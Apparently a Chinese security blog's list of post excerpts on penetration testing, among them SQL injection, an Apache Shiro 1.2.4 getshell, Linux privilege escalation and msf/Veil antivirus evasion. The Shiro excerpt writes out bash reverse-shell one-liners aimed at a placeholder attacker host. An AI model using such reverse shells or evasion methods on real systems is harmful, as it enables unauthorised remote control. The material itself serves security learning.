原创 Web滲透測試求職問答大全

0x00前言      如果我們要面試一個滲透測試工程師,其中一些經典的問題是必要會被問到的,所以本文就這些方面進行一個比較基礎的總結,希望這些總結會對大家面試有所幫助。更重要的是,本文將非常非常具體地分析每一個步驟、所需的工具、思路等等

原创 犀利的 oracle 注入技術

原來一直不知道oracle注入可以你拿shell,特意記錄下 以下的演示都是在web上的sql plus執行的,在web注入時 把select SYS.DBMS_EXPORT_EXTENSION.....改成    /xxx.jsp?

原创 使用burp插件自動更新JS中的hash簽名

       這次測試遇到了些問題,踩了一些坑,爲後來者記。        本次測試遇到的主要問題是服務端要驗證sign值,sign值由sha1(salt+post data)生成,我如果要更改post data進行測試的話,就必須更新s

原创 Apache shiro1.2.4 Getshell

方法一 利用JRMPClient 反彈shell方式 Bash: bash -i >& /dev/tcp/attackIP/7777 0>&1 /bin/bash -i > /dev/tcp/attackIP/7777 0<&1 2>&1

原创 SQL注入與防禦研究(一)

本文持續更新。爲SQL注入攻擊與防禦第二版讀後感 第一章 SQL注入產生過程: 1.字符處理不當        '作爲分界線。 2.類型處理不當        數字型,沒加單引號,直接可繼續執行命令。 LOAD_FILE, SELECT

原创 安卓安全——讀書筆記

想到什麼就隨手寫點吧,最近剛看完《Android軟件安全與逆向分析》。 另外還有一本《Android應用安全防護和逆向分析》,準備開始看。兩本書的PDF鏈接我會放在末尾,需要的自取。   《Android軟件安全與逆向分析》書中提到了多種

原创 如何解決selenium與firefox版本不匹配的問題

在做wechat爬蟲時遇到的問題,整理記錄下: 1.selenium與firefox版本不匹配: 報錯爲 : selenium.common.exceptions.WebDriverException: Message: Can't lo

原创 Linux 提權的各種姿勢總結

這篇講一些關於 Linux 提權的方法,也是參考網上的一些提權方式,對於剛接觸 Linux 提權的夥伴來說,需要花不少時間去理解,所以這裏是以個人通俗易懂的思路去寫,希望能幫到熱愛學習的朋友,先寫這些提權方法。若有更好的提權方式,歡迎老哥

原创 sqlmap一力破十會

因自身需要轉載,當工具書使用: 轉載自http://www.cnblogs.com/r00tuser/p/7252796.html 前言 在早之前我對於tamper的使用一直都是停留在錯誤的思維。想着bypass,應該要先手動fu

原创 從kali到msf再到veil免殺的一條龍踩坑服務指南

因爲研究需要,特將過程進行記錄: 0X01 添加kali rolling官方源 我這裏將原來的源全部註釋了,僅使用了kali的rolling官方源: vi /etc/apt/sources.list [html] vie

原创 適用於滲透測試不同階段的工具收集整理

Red Teaming / Adversary Simulation Toolkit 內容 偵察 武器化 交貨 命令與控制 橫向運動 建立立足點 升級特權 數據泄露 雜項 參考 偵察 主動情報收集 EyeWitness:可用於網站截圖,以

原创 一個用於爬取智聯招聘信息的python爬蟲

#coding:utf-8 import re import requests import Queue import threading import pymongo from config import * from urllib

原创 入侵取證調查

0x00 前言 在我們日常運維中,難免有幾個網站或者主機被入侵,這時就出現應急響應需求。那麼我們應該怎樣着手分析暱?本文將爲你細細道來,其中由於都是文字描述思路,所以各位要有耐心讀完全文。但是這個思路分析講解得非常詳細,按部就班,一步一步

原创 滲透工具之msf

轉載自 csdn:憶蓉之心 簡介 它是一個免費的、可下載的框架,通過它可以很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。 環境 工具:msf4 僞裝木馬 原理:msfvenom是msfp

原创 Scanners Box

轉載自:https://github.com/We5ter/Scanners-Box Scanners Box是一個集合github平臺上的安全行業從業者自研開源掃描器的倉庫,包括子域名枚舉、數據庫漏洞掃描、弱口令或信息泄漏掃描、端口